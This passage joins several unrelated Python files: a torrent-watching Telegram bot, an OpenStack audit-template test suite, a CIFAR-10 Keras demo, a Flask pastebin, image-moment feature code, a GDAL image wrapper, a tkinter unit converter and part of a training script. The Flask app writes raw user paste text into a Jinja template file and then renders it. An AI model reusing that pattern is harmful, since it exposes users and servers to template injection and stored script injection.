text='[%s](%s%s) - [%s](%s) - %s'\n % (naming_link.get_text(' ', strip=True),URL_RUTOR,\n naming_link['href'], size, direct_link, id),\n parse_mode=telegram.ParseMode.MARKDOWN)\n\n save_to_file(BANNED_FILE, id)\n BANNED.append(id)\n\n\ndef check(result):\n for fil in FILTER:\n try:\n if fil.decode('utf-8').lower() in result.get_text(' ', strip=True).lower():\n return False\n except Exception:\n if fil.lower() in result.get_text(' ', strip=True).lower():\n return False\n for ban in BANNED:\n if ban.rstrip('\\n') in result['href']:\n return False\n return True\n\n\ndef run_command(chat_id, cmd):\n global last_time\n if cmd.startswith('/addfilter'):\n operation(cmd, chat_id, 'ADD_FILTER')\n elif cmd == '/showfilters':\n show_filters(chat_id)\n elif cmd.startswith('/ban'):\n operation(cmd, chat_id, 'BAN')\n elif cmd == '/showbans':\n list = get_text_from_file(BANNED_FILE)\n if len(list) > 0:\n bot.sendMessage(chat_id=chat_id, text='This is your banned list:\\n%s' % list)\n else:\n bot.sendMessage(chat_id=chat_id, text='Seems that your banned list is empty')\n elif cmd == '/check':\n check_movies()\n last_time = time.time()\n bot.sendMessage(chat_id=chat_id,\n text='Checked: %s' % time.strftime('%H:%M:%S', time.localtime(last_time)))\n elif cmd == '/lastrun':\n bot.sendMessage(chat_id=chat_id,\n text='Last run was at: %s' % time.strftime('%H:%M:%S', time.localtime(last_time)))\n elif cmd.startswith('/rand'):\n randomize(cmd, chat_id)\n elif cmd.startswith('/add'):\n operation(cmd, chat_id, 'ADD_MOVIE')\n elif cmd.startswith('/remove'):\n operation(cmd, chat_id, 'REMOVE_MOVIE')\n elif cmd == '/list':\n list = get_text_from_file(MOVIES)\n if len(list) > 0:\n bot.sendMessage(chat_id=chat_id, text='This is your movie list:\\n%s' % list)\n else:\n bot.sendMessage(chat_id=chat_id, text='Seems that your movie list is empty')\n else:\n bot.sendMessage(chat_id=chat_id, text='Got it.')\n\n\ndef operation(cmd, chat_id, type):\n arg = ''\n if len(cmd.split(' ', 1)) > 1:\n arg = 
cmd.split(' ', 1)[1].strip()\n if len(arg) > 0:\n if type == 'ADD_FILTER':\n FILTER.append(arg)\n bot.sendMessage(chat_id=chat_id, text='Added temp filter: %s' % arg)\n elif type == 'BAN' and save_to_file(BANNED_FILE, arg):\n BANNED.append(arg)\n bot.sendMessage(chat_id=chat_id, text='Added to ban list: %s' % arg)\n elif type == 'ADD_MOVIE' and save_to_file(MOVIES, arg):\n bot.sendMessage(chat_id=chat_id, text='Added film: %s' % arg)\n elif type == 'REMOVE_MOVIE' and delete_from_file(MOVIES, arg):\n bot.sendMessage(chat_id=chat_id, text='Removed film: %s' % arg)\n else:\n bot.sendMessage(chat_id=chat_id, text='Sorry couldn\\'t do that.')\n\n\ndef show_filters(chat_id):\n filters = ''\n for item in FILTER:\n try:\n filters = filters + '%s\\n' % item.decode('utf-8')\n except Exception:\n filters = filters + '%s\\n' % item\n if len(filters) > 0:\n bot.sendMessage(chat_id=chat_id, text='This is your notifications filter list:\\n%s' % filters)\n else:\n bot.sendMessage(chat_id=chat_id, text='Seems that your filter list is empty')\n\n\ndef randomize(cmd, chat_id):\n try:\n list = cmd.split(' ')\n a, b = int(list[1]), int(list[2])\n bot.sendMessage(chat_id=chat_id, text=random.randint(a, b))\n except Exception:\n bot.sendMessage(chat_id=chat_id, text='Encountered an error. 
Sorry.')\n\n\ndef save_to_file(file, arg):\n try:\n with codecs.open(file, 'a', 'utf-8') as f:\n f.write(arg + '\\n')\n return True\n except IOError:\n return False\n\n\ndef delete_from_file(file, arg):\n try:\n with codecs.open(file, 'r+') as f:\n d = f.readlines()\n f.seek(0)\n for i in d:\n if i.rstrip('\\n') != arg:\n f.write(i)\n f.truncate()\n f.close()\n return True\n except IOError:\n return False\n\nif __name__ == '__main__':\n main()\n","sub_path":"telegram-bot.py","file_name":"telegram-bot.py","file_ext":"py","file_size_in_byte":7596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"479541416","text":"# -*- coding: utf-8 -*-\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport six\n\nfrom tempest_lib import exceptions as lib_exc\n\nfrom tempest.api.infra_optim.admin import base\nfrom tempest import test\n\n\nclass TestAuditTemplate(base.BaseInfraOptimTest):\n \"\"\"Tests for audit_template.\"\"\"\n\n @classmethod\n def resource_setup(cls):\n super(TestAuditTemplate, cls).resource_setup()\n _, cls.audit_template = cls.create_audit_template()\n\n def _assertExpected(self, expected, actual):\n # Check if not expected keys/values exists in actual response body\n for key, value in six.iteritems(expected):\n if key not in ('created_at', 'updated_at', 'deleted_at'):\n self.assertIn(key, actual)\n self.assertEqual(value, actual[key])\n\n @test.attr(type='smoke')\n def test_create_audit_template(self):\n params = {'name': 'my at name',\n 'description': 'my at description',\n 'host_aggregate': 12,\n 'goal': 'A GOAL',\n 'extra': {'str': 'value', 'int': 123, 'float': 0.123,\n 'bool': True, 'list': [1, 2, 3],\n 'dict': {'foo': 'bar'}}}\n\n _, body = self.create_audit_template(**params)\n self._assertExpected(params, body['properties'])\n\n _, audit_template = self.client.show_audit_template(body['uuid'])\n self._assertExpected(audit_template, body)\n\n @test.attr(type='smoke')\n def test_create_audit_template_unicode_description(self):\n # Use a unicode string for testing:\n params = {'name': 'my at name',\n 'description': 'my àt déscrïptïôn',\n 'host_aggregate': 12,\n 'goal': 'A GOAL',\n 'extra': {'foo': 'bar'}}\n\n _, body = self.create_audit_template(**params)\n self._assertExpected(params, body['properties'])\n\n _, audit_template = self.client.show_audit_template(body['uuid'])\n self._assertExpected(audit_template, body)\n\n @test.attr(type='smoke')\n def test_show_audit_template(self):\n _, audit_template = self.client.show_audit_template(\n self.audit_template['uuid'])\n self._assertExpected(self.audit_template, 
audit_template)\n\n @test.attr(type='smoke')\n def test_show_audit_template_by_goal(self):\n _, audit_template = self.client.\\\n show_audit_template_by_goal(self.audit_template['goal'])\n self._assertExpected(self.audit_template,\n audit_template['audit_templates'][0])\n\n @test.attr(type='smoke')\n def test_show_audit_template_by_host_aggregate(self):\n _, audit_template = self.client.\\\n show_audit_template_by_host_aggregate(\n self.audit_template['host_aggregate'])\n self._assertExpected(self.audit_template,\n audit_template['audit_templates'][0])\n\n @test.attr(type='smoke')\n def test_show_audit_template_with_links(self):\n _, audit_template = self.client.show_audit_template(\n self.audit_template['uuid'])\n self.assertIn('links', audit_template.keys())\n self.assertEqual(2, len(audit_template['links']))\n self.assertIn(audit_template['uuid'],\n audit_template['links'][0]['href'])\n\n @test.attr(type=\"smoke\")\n def test_list_audit_templates(self):\n _, body = self.client.list_audit_templates()\n self.assertIn(self.audit_template['uuid'],\n [i['uuid'] for i in body['audit_templates']])\n # Verify self links.\n for audit_template in body['audit_templates']:\n self.validate_self_link('audit_templates', audit_template['uuid'],\n audit_template['links'][0]['href'])\n\n @test.attr(type='smoke')\n def test_list_with_limit(self):\n _, body = self.client.list_audit_templates(limit=3)\n\n next_marker = body['audit_templates'][-1]['uuid']\n self.assertIn(next_marker, body['next'])\n\n @test.attr(type='smoke')\n def test_delete_audit_template(self):\n _, body = self.create_audit_template()\n uuid = body['uuid']\n\n self.delete_audit_template(uuid)\n self.assertRaises(lib_exc.NotFound, self.client.show_audit_template,\n uuid)\n\n @test.attr(type='smoke')\n def test_update_audit_template_replace(self):\n params = {'name': 'my at name',\n 'description': 'my at description',\n 'host_aggregate': 12,\n 'goal': 'A GOAL',\n 'extra': {'key1': 'value1', 'key2': 'value2'}}\n\n 
_, body = self.create_audit_template(**params)\n\n new_name = 'my at new name'\n new_description = 'my new at description'\n new_host_aggregate = 10\n new_goal = 'A NEW GOAL'\n new_extra = {'key1': 'new-value1', 'key2': 'new-value2'}\n\n patch = [{'path': '/name',\n 'op': 'replace',\n 'value': new_name},\n {'path': '/description',\n 'op': 'replace',\n 'value': new_description},\n {'path': '/host_aggregate',\n 'op': 'replace',\n 'value': new_host_aggregate},\n {'path': '/goal',\n 'op': 'replace',\n 'value': new_goal},\n {'path': '/extra/key1',\n 'op': 'replace',\n 'value': new_extra['key1']},\n {'path': '/extra/key2',\n 'op': 'replace',\n 'value': new_extra['key2']}]\n\n self.client.update_audit_template(body['uuid'], patch)\n\n _, body = self.client.show_audit_template(body['uuid'])\n self.assertEqual(new_name, body['name'])\n self.assertEqual(new_description, body['description'])\n self.assertEqual(new_host_aggregate, body['host_aggregate'])\n self.assertEqual(new_goal, body['goal'])\n self.assertEqual(new_extra, body['extra'])\n\n @test.attr(type='smoke')\n def test_update_audit_template_remove(self):\n extra = {'key1': 'value1', 'key2': 'value2', 'key3': 'value3'}\n description = 'my at description'\n goal = 'A GOAL'\n name = 'my at name'\n params = {'name': name,\n 'description': description,\n 'host_aggregate': 12,\n 'goal': goal,\n 'extra': extra}\n\n _, audit_template = self.create_audit_template(**params)\n\n # Removing one item from the collection\n self.client.update_audit_template(\n audit_template['uuid'],\n [{'path': '/extra/key2', 'op': 'remove'}])\n\n extra.pop('key2')\n _, body = self.client.show_audit_template(audit_template['uuid'])\n self.assertEqual(extra, body['extra'])\n\n # Removing the collection\n self.client.update_audit_template(\n audit_template['uuid'],\n [{'path': '/extra', 'op': 'remove'}])\n _, body = self.client.show_audit_template(audit_template['uuid'])\n self.assertEqual({}, body['extra'])\n\n # Removing the Host Aggregate ID\n 
self.client.update_audit_template(\n audit_template['uuid'],\n [{'path': '/host_aggregate', 'op': 'remove'}])\n _, body = self.client.show_audit_template(audit_template['uuid'])\n self.assertEqual('', body['extra'])\n\n # Assert nothing else was changed\n self.assertEqual(name, body['name'])\n self.assertEqual(description, body['description'])\n self.assertEqual(goal, body['goal'])\n\n @test.attr(type='smoke')\n def test_update_audit_template_add(self):\n params = {'name': 'my at name',\n 'description': 'my at description',\n 'host_aggregate': 12,\n 'goal': 'A GOAL'}\n\n _, body = self.create_audit_template(**params)\n\n extra = {'key1': 'value1', 'key2': 'value2'}\n\n patch = [{'path': '/extra/key1',\n 'op': 'add',\n 'value': extra['key1']},\n {'path': '/extra/key2',\n 'op': 'add',\n 'value': extra['key2']}]\n\n self.client.update_audit_template(body['uuid'], patch)\n\n _, body = self.client.show_audit_template(body['uuid'])\n self.assertEqual(extra, body['extra'])\n\n @test.attr(type='smoke')\n def test_audit_template_audit_list(self):\n _, audit = self.create_audit(self.audit_template['uuid'])\n _, body = self.client.list_audit_template_audits(\n self.audit_template['uuid'])\n self.assertIn(audit['uuid'], [n['uuid'] for n in body['audits']])\n","sub_path":"watcher/contrib/tempest/tempest/api/infra_optim/admin/test_audit_template.py","file_name":"test_audit_template.py","file_ext":"py","file_size_in_byte":9271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"282228388","text":"# CIFAR-10은 총 10개의 레이블로 이루어진 6만장의 칼라 이미지를 가지며 5만장은 트레이닝, 1만장은 테스트 용\n# 10가지 클래스를 담고 있다.\n# airplane, automobile, bird, cat, deer, dog, frog, horse, ship, truck\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.layers import Input, Flatten, Dense, Conv2D\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import to_categorical\nfrom 
tensorflow.keras.datasets import cifar10\n\nNUM_CLASSES = 10\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\nprint (\"Training data:\")\nprint (\"Number of examples: \", x_train.shape[0])\nprint (\"Number of channels:\",x_train.shape[3]) \nprint (\"Image size:\", x_train.shape[1], x_train.shape[2])\nprint (\"Test data:\")\nprint (\"Number of examples:\", x_test.shape[0])\nprint (\"Number of channels:\", x_test.shape[3])\nprint (\"Image size:\", x_test.shape[1], x_test.shape[2]) \nprint(x_train.shape, x_train.dtype)\n # Training data:\n # Number of examples: 50000\n # Number of channels: 3\n # Image size: 32 32\n # Test data:\n # Number of examples: 10000\n # Number of channels: 3\n # Image size: 32 32\n # (50000, 32, 32, 3) uint8\n\n# print(x_train[0]) #[[[ 59 62 63] [ 43 46 45] ...\n# print(y_train[0]) #[6]\n\nplt.figure(figsize=(12,4))\nplt.subplot(131) # 1행 3열 중 1열 \nplt.imshow(x_train[0], interpolation=\"bicubic\")\nplt.subplot(132)\nplt.imshow(x_train[1], interpolation=\"bicubic\")\nplt.subplot(133)\nplt.imshow(x_train[2], interpolation=\"bicubic\")\nplt.show()\n\nx_train = x_train.astype('float32') / 255.0\nx_test = x_test.astype('float32') / 255.0\n\ny_train = to_categorical(y_train, NUM_CLASSES)\ny_test = to_categorical(y_test, NUM_CLASSES)\nprint(x_train[54, 12, 13, 1]) # 0.36862, 인덱스 54의 이미지에서 (12, 13) 위치에 해당하는 픽셀의 초록 채널 값을 의미\n\n# architecture -- Sequential model 이용(CNN X)\n# model = Sequential([\n# Dense(200, activation='relu', input_shape = (32, 32, 3)),\n# Flatten(),\n# Dense(150, activation='relu'),\n# Dense(NUM_CLASSES, activation='softmax'),\n# ])\n# print(model.summary())\n\n# architecture -- function API 이용\ninput_layer = Input((32,32,3))\nx = Flatten()(input_layer)\nx = Dense(200, activation = 'relu')(x)\nx = Dense(150, activation = 'relu')(x)\noutput_layer = Dense(NUM_CLASSES, activation = 'softmax')(x)\nmodel = Model(input_layer, output_layer)\nprint(model.summary())\n\n# train\nopt = 
Adam(lr=0.01)\nmodel.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n\nmodel.fit(x_train, y_train, batch_size=128, epochs=10, shuffle=True, verbose=2)\nprint('test acc : %.4f'%(model.evaluate(x_test, y_test, verbose=0, batch_size=128)[1]))\nprint('test loss : %.4f'%(model.evaluate(x_test, y_test, verbose=0, batch_size=128)[0]))\n\nprint()\nCLASSES = np.array(['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'])\n\npred = model.predict(x_test[:10])\npred_single = CLASSES[np.argmax(pred, axis = -1)]\nactual_single = CLASSES[np.argmax(y_test[:10], axis = -1)]\nprint('예측값 : ', pred_single)\nprint('실제값 : ', actual_single)\n # 예측값 : ['dog' 'truck' 'ship' 'airplane' 'frog' 'frog' 'frog' 'frog' 'dog' 'ship']\n # 실제값 : ['cat' 'ship' 'ship' 'airplane' 'frog' 'frog' 'automobile' 'frog' 'cat' 'automobile']\nprint('분류 실패 수 : ', (pred_single != actual_single).sum())\n\n# 시각화\nfig = plt.figure(figsize=(15, 3))\nfig.subplots_adjust(hspace=0.4, wspace=0.4)\n\nfor i, idx in enumerate(range(len(x_test[:10]))):\n img = x_test[idx]\n ax = fig.add_subplot(1, len(x_test[:10]), i + 1)\n ax.axis('off')\n ax.text(0.5, -0.35, 'pred = ' + str(pred_single[idx]), \\\n fontsize=10, ha='center', transform=ax.transAxes) \n ax.text(0.5, -0.7, 'act = ' + str(actual_single[idx]), \\\n fontsize=10, ha='center', transform=ax.transAxes)\n ax.imshow(img)\nplt.show()","sub_path":"Python/py_tensorflow/pack/tf03/ke_ex22cifar.py","file_name":"ke_ex22cifar.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"223507489","text":"import hashlib\nimport datetime as dt\nimport os\nimport MySQLdb\nimport variables\nfrom pygments import lexers\nfrom pygments.formatters import get_all_formatters\nfrom pygments.formatters.html import HtmlFormatter\nfrom pygments import highlight\nimport CheckingExpiry\nfrom datetime import datetime\nfrom flask import 
abort\nfrom flask import Flask, redirect, url_for, request, render_template\n\nformat = '%Y-%m-%d %H:%M:%S'\n\napp = Flask(__name__)\nuser_data = None\nfilename = None\ntimelimit=None\nlexername=None\n\n@app.route('/')\ndef index():\n return render_template('test1.html')\n\n\ndef filetest():\n global user_data, filename, timelimit, lexername\n formatter = HtmlFormatter(linenos=True, style=\"monokai\")\n lex = lexers.get_lexer_by_name(lexername)\n code=highlight(user_data, lex, formatter)\n path = '/home/pavan/PycharmProjects/example2/templates/' + filename\n Html_file = open(path, \"w\")\n Html_file.write(\"\"\"\n \n \n \n \n Pasteit\n \n \n \n \n \n
\n \"\"\")\n Html_file.write(\"{0}\".format(code))\n Html_file.write(\"\"\"
\"\"\")\n Html_file.write(\"{0}\".format(variables.str))\n Html_file.write(\"{0}\".format(user_data))\n Html_file.write(\"\"\"

\n \n \n \n \"\"\")\n Html_file.close()\n now = datetime.strptime(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), format)\n expire = now+dt.timedelta(seconds=int(timelimit))\n #print(timelimit)\n CheckingExpiry.ins(now, expire, path)\n\n return render_template('%s' %filename )\n\n\n@app.route('/success/')\ndef success(name):\n global filename, timelimit\n filename = name + \".html\"\n path = '/home/pavan/PycharmProjects/example2/templates/'+filename\n CheckingExpiry.checkdata(path)\n if os.path.isfile(path):\n return render_template('%s' %filename )\n else:\n return abort(404)\n\n\n@app.route('/login', methods=['POST', 'GET'])\ndef login():\n global user_data, filename, timelimit, lexername\n user_data=None\n userdata = None\n if request.method == 'POST':\n timelimit=request.form['expires']\n lexername = request.form['lexer']\n userdata = request.form['nm']\n user_data=userdata\n hash = hashlib.sha1(str(dt.datetime.now()).encode(\"UTF-8\")).hexdigest()\n filename = hash[:8] + \".html\"\n filetest()\n return redirect(url_for('success', name=hash[:8]))\n\n else:\n userdata = request.args.get('nm')\n return redirect(url_for('success', name=userdata))\n\nif __name__ == '__main__':\n app.run(debug = True)\n\n\n","sub_path":"example2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542381531","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 23 20:47:17 2018\n\n@author: shubhamsinha\n\"\"\"\nimport numpy as np\nfrom numpy import mgrid, sum\n\n\ndef extractfeatures(image):\n x, y = mgrid[:image.shape[0],:image.shape[1]]\n moments = {}\n moments['mean_x'] = sum(x*image)/sum(image)\n moments['mean_y'] = sum(y*image)/sum(image)\n \n # raw or spatial moments\n moments['m00'] = sum(image)\n moments['m01'] = sum(x*image)\n moments['m10'] = sum(y*image)\n moments['m11'] = sum(y*x*image)\n moments['m02'] = sum(x**2*image)\n 
moments['m20'] = sum(y**2*image)\n moments['m12'] = sum(x*y**2*image)\n moments['m21'] = sum(x**2*y*image)\n moments['m03'] = sum(x**3*image)\n moments['m30'] = sum(y**3*image)\n \n # central moments\n # moments['mu01']= sum((y-moments['mean_y'])*image) # should be 0\n # moments['mu10']= sum((x-moments['mean_x'])*image) # should be 0\n moments['mu11'] = sum((x-moments['mean_x'])*(y-moments['mean_y'])*image)\n moments['mu02'] = sum((y-moments['mean_y'])**2*image) # variance\n moments['mu20'] = sum((x-moments['mean_x'])**2*image) # variance\n moments['mu12'] = sum((x-moments['mean_x'])*(y-moments['mean_y'])**2*image)\n moments['mu21'] = sum((x-moments['mean_x'])**2*(y-moments['mean_y'])*image) \n moments['mu03'] = sum((y-moments['mean_y'])**3*image) \n moments['mu30'] = sum((x-moments['mean_x'])**3*image) \n\n feature=np.zeros((10),dtype=int)\n feature[0]=moments['mean_x']\n feature[1]=moments['mean_y']\n feature[2]=moments['m00']\n feature[3]=moments['mu11']\n feature[4]=moments['mu02']\n feature[5]=moments['mu20']\n feature[6]=moments['mu12']\n feature[7]=moments['mu21']\n feature[8]=moments['mu03']\n feature[9]=moments['mu30']\n \n return feature\n","sub_path":"facedata/extractfeature.py","file_name":"extractfeature.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"536421319","text":"'''\nCopyright 2015 Planet Labs, Inc.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n'''\nimport 
logging\nfrom collections import namedtuple\n\nimport numpy\nfrom osgeo import gdal, gdal_array\n\n# In-memory geospatial image\n# Bands: list of uint16 numpy arrays, each holding a band of data\n# Alpha: uint16 numpy array holding the alpha information\n# Metadata: dict containing georeferencing information\n# (geotransform, projection, rpc)\nGImage = namedtuple('GImage', 'bands, alpha, metadata')\n\n\ndef save(gimage, filename, nodata=None, compress=True):\n gdal_ds = create_ds(gimage, filename, compress)\n save_to_ds(gimage, gdal_ds, nodata)\n\n\ndef create_ds(gimage, filename, compress):\n # Alpha is saved as the last band\n band_count = len(gimage.bands) + 1\n options = ['ALPHA=YES']\n\n if band_count == 4:\n options.append('PHOTOMETRIC=RGB')\n\n if compress:\n options.append('COMPRESS=DEFLATE')\n options.append('PREDICTOR=2')\n\n datatype = gdal.GDT_UInt16\n ysize, xsize = gimage.bands[0].shape\n gdal_ds = gdal.GetDriverByName('GTIFF').Create(\n filename, xsize, ysize, band_count, datatype,\n options=options)\n return gdal_ds\n\n\ndef save_to_ds(gimage, gdal_ds, nodata=None):\n assert gdal_ds.RasterCount == len(gimage.bands) + 1\n assert gdal_ds.RasterXSize == gimage.bands[0].shape[1]\n assert gdal_ds.RasterYSize == gimage.bands[0].shape[0]\n\n for i, band in enumerate(gimage.bands):\n gdal_array.BandWriteArray(\n gdal_ds.GetRasterBand(i + 1), band)\n if nodata is not None:\n gdal_ds.GetRasterBand(i + 1).SetNoDataValue(nodata)\n\n alpha_band = gdal_ds.GetRasterBand(gdal_ds.RasterCount)\n gdal_array.BandWriteArray(alpha_band, gimage.alpha)\n\n # Save georeferencing information\n if 'projection' in gimage.metadata.keys():\n gdal_ds.SetProjection(gimage.metadata['projection'])\n if 'geotransform' in gimage.metadata.keys():\n gdal_ds.SetGeoTransform(gimage.metadata['geotransform'])\n if 'rpc' in gimage.metadata.keys():\n gdal_ds.SetMetadata(gimage.metadata['rpc'], 'RPC')\n\n\ndef load(filename, nodata=None):\n logging.debug(\"Loading {} as 
GImage.\".format(filename))\n gdal_ds = gdal.Open(filename)\n if gdal_ds is None:\n raise Exception('Unable to open file \"{}\" with gdal.Open()'.format(\n filename))\n\n alpha, band_count = _read_alpha_and_band_count(gdal_ds)\n bands = _read_all_bands(gdal_ds, band_count)\n metadata = _read_metadata(gdal_ds)\n\n if nodata is not None:\n alpha = alpha * _nodata_to_mask(bands, nodata)\n return GImage(bands, alpha, metadata)\n\n\ndef _read_metadata(gdal_ds):\n metadata = {}\n\n default_geotransform = (-1.0, 1.0, 0.0, 1.0, 0.0, -1.0)\n geotransform = gdal_ds.GetGeoTransform()\n if geotransform == default_geotransform:\n logging.info(\"Raster has default geotransform, not storing.\")\n else:\n metadata['geotransform'] = geotransform\n\n projection = gdal_ds.GetProjection()\n if projection == '':\n logging.info(\"Raster has no projection information, not storing.\")\n else:\n metadata['projection'] = gdal_ds.GetProjection()\n\n rpc = gdal_ds.GetMetadata('RPC')\n if rpc == {}:\n logging.info(\"Raster has no rpc information, not storing.\")\n else:\n metadata['rpc'] = rpc\n return metadata\n\n\ndef _read_all_bands(gdal_ds, band_count):\n bands = []\n for band_n in range(1, band_count + 1):\n bands.append(_read_single_band(gdal_ds, band_n))\n return bands\n\n\ndef _read_single_band(gdal_ds, band_no):\n ''' band_no is gdal style band numbering, i.e. from 1 onwards not 0 indexed\n '''\n band = gdal_ds.GetRasterBand(band_no)\n array = band.ReadAsArray()\n if array is None:\n raise Exception(\n 'GDAL error occured : {}'.format(gdal.GetLastErrorMsg()))\n return array.astype(numpy.uint16)\n\n\ndef _read_alpha_and_band_count(gdal_ds):\n logging.debug(\"Loading alpha. 
Initial band count: {}\".format(\n gdal_ds.RasterCount))\n last_band = gdal_ds.GetRasterBand(gdal_ds.RasterCount)\n if last_band.GetColorInterpretation() == gdal.GCI_AlphaBand:\n alpha = last_band.ReadAsArray()\n logging.debug(\"Alpha band found, reducing band count\")\n band_count = gdal_ds.RasterCount - 1\n else:\n alpha = 65535 * numpy.ones(\n (gdal_ds.RasterYSize, gdal_ds.RasterXSize),\n dtype=numpy.uint16)\n band_count = gdal_ds.RasterCount\n return alpha, band_count\n\n\ndef _nodata_to_mask(bands, nodata):\n alpha = numpy.ones(bands[0].shape, dtype=numpy.uint16)\n for band in bands:\n alpha[band == nodata] = 0\n return alpha\n\n\ndef check_comparable(gimages, check_metadata=False):\n '''Checks that the gimages have the same number of bands, band dimensions,\n and, optionally, geospatial metadata'''\n\n no_bands = len(gimages[0].bands)\n band_shape = gimages[0].bands[0].shape\n metadata = gimages[0].metadata\n\n logging.debug('Initial image - band number, band shape: {}, {}'.format(\n no_bands, band_shape))\n logging.debug('Initial image metadata: '.format(metadata))\n\n for i, image in enumerate(gimages[1:]):\n if len(image.bands) != no_bands:\n raise Exception(\n 'Image {} has a different number of bands: '\n '{} (initial: {})'.format(i + 1, len(image.bands), no_bands))\n\n if image.bands[0].shape != band_shape:\n raise Exception(\n 'Image {} has a different band shape: {} (initial: {})'.format(\n i + 1, image.bands[0].shape, band_shape))\n\n if check_metadata and image.metadata != metadata:\n raise Exception(\n 'Image {} has different geographic metadata: {} '\n '(initial: {})'.format(i + 1, image.metadata, metadata))\n\n\ndef check_equal(gimages, check_metadata=False):\n '''Checks that the gimages are equavalent'''\n\n check_comparable(gimages, check_metadata)\n\n first_gimg = gimages[0]\n for i, image in enumerate(gimages[1:]):\n numpy.testing.assert_equal(first_gimg.bands, image.bands,\n err_msg='Image {} has different band data'\n ' to the first 
image'.format(i))\n\n numpy.testing.assert_equal(first_gimg.alpha, image.alpha,\n err_msg='Image {} has different alpha data'\n ' to the first image'.format(i))\n","sub_path":"radiometric_normalization/gimage.py","file_name":"gimage.py","file_ext":"py","file_size_in_byte":6953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"645970058","text":"import tkinter\n\nwindow = tkinter.Tk()\nwindow.title(\"My first GUI Program\")\n# window.minsize(width=500, height=300)\nwindow.config(padx=20, pady=20)\n\nmile_label = tkinter.Label(text=\"Miles\", font=(\"Arial\", 10, \"bold\"))\nmile_label.grid(column=2, row=0)\n# Label\neqal_label = tkinter.Label(text=\"is equal to \", font=(\"Arial\", 10, \"bold\"))\neqal_label.grid(column=0, row=1)\n\ncalculate_label = tkinter.Label(text=\"0\", font=(\"Arial\", 10, \"bold\"))\ncalculate_label.grid(column=1, row=1)\ncalculate_label.config(padx=50)\n\nkm_label = tkinter.Label(text=\"Km\", font=(\"Arial\", 10, \"bold\"))\nkm_label.grid(column=2, row=1)\n\n\ndef button_clicked():\n calculate = round(float(input.get()) / 0.62137, 2)\n calculate_label[\"text\"] = calculate\n calculate_label.grid(column=1, row=1)\n\n\n# Botton\ncalculate_button = tkinter.Button(text=\"Calculate\", command=button_clicked)\ncalculate_button.grid(column=1, row=2)\n\n# new_button = tkinter.Button(text=\"New Button\", command=button_clicked)\n# new_button.grid(column=2, row=0)\n# #Entry\ninput = tkinter.Entry(text=\"0\", width=10)\ninput.get()\ninput.grid(column=1, row=0)\n\nwindow.mainloop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"494883710","text":"import argparse\nimport pickle as pkl\nimport os\nfrom os.path import join, exists\nfrom types import SimpleNamespace\n\nimport torch\nfrom train_abstractor import prep_trainer as abs_prep_trainer\nfrom 
train_extractor_ml import prep_trainer as exs_prep_trainer\nfrom utils import make_vocab, make_embedding\n\ntry:\n DATA_DIR = os.environ['DATA']\nexcept KeyError:\n print('please use environment variable to specify datadirectories')\n\ndef main(args):\n with open(join(DATA_DIR, 'vocab_cnt.pkl'), 'rb') as f:\n wc = pkl.load(f)\n word2id = make_vocab(wc, args.vsize)\n\n abs_args = SimpleNamespace(\n **vars(args),\n path='./uni_pretrained_abstractor',\n w2v='./word_vectors/word2vec.128d.226k.bin',\n n_layer=1,\n n_hidden=256,\n max_art=100,\n max_abs=30,\n )\n abs_trainer, abs_net = abs_prep_trainer(abs_args, word2id=word2id)\n\n exs_args = SimpleNamespace(\n **vars(args),\n path='./uni_pretrained_extractor',\n w2v=None, # no embedding since reuse abs's encoder\n net_type='rnn',\n lstm_layer=1,\n lstm_hidden=256,\n max_word=100,\n max_sent=60\n )\n\n exs_trainer, _ = exs_prep_trainer(exs_args, word2id=word2id, encoder=abs_net.encoder)\n\n # training generator\n exs_train_gen = exs_trainer.train_gen('extractor')\n abs_train_gen = abs_trainer.train_gen('abstractor')\n\n for exs_end, abs_end in zip(exs_train_gen, abs_train_gen):\n if exs_end and abs_end:\n print('Uni Training End')\n break\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='training of the abstractor (ML)'\n )\n\n parser.add_argument('--vsize', type=int, action='store', default=30000,\n help='vocabulary size')\n parser.add_argument('--emb_dim', type=int, action='store', default=128,\n help='the dimension of word embedding')\n\n\n parser.add_argument('--no-bi', action='store_true',\n help='disable bidirectional LSTM encoder')\n\n # training options\n parser.add_argument('--lr', type=float, action='store', default=1e-3,\n help='learning rate')\n parser.add_argument('--decay', type=float, action='store', default=0.5,\n help='learning rate decay ratio')\n 